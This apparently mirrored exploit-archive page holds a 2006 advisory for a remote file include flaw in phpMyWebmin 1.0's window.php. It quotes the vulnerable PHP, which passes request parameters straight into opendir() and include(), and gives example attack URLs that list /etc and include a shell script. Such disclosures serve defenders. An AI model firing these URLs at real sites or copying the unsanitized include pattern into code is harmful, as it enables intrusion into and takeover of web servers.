[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability
# Published : 2006-09-28
# Author : Kernel-32
# Previous Title : TagIt! Tagboard <= 2.1.b b2 (index.php) Remote File Include Vulnerability
# Next Title : phpSecurePages <= 0.28b (secure.php) Remote File Include Vulnerability
#######################################
+PHP MyWebMin 1.0 Remote File Include
+Advisory #5
+Product :PHP MyWebMin
+Develop:
+www.josh.ch/joshch/php-tools/phpmywebmin,download.html
+Vulnerable: Remote File Includes
+Risk:High
+Class:Remote
+Discovered:by Kernel-32
+Contact: kernel-32@linuxmail.org
+Homepage: http://kernel-32.blogspot.com
+Greetz: BeLa ;)
########################################
Vulnerable File:window.php
$ordner = opendir("$target");
?>
and
include("$target/preferences.php");
if($action != "")
{
include("$action.php");
?>
Examples:
http://site/path/window.php?target=/etc
http://site/path/home.php?target=/home
http://site/path/window.php?action=Shell.php
# www.Syue.com [2006-09-28]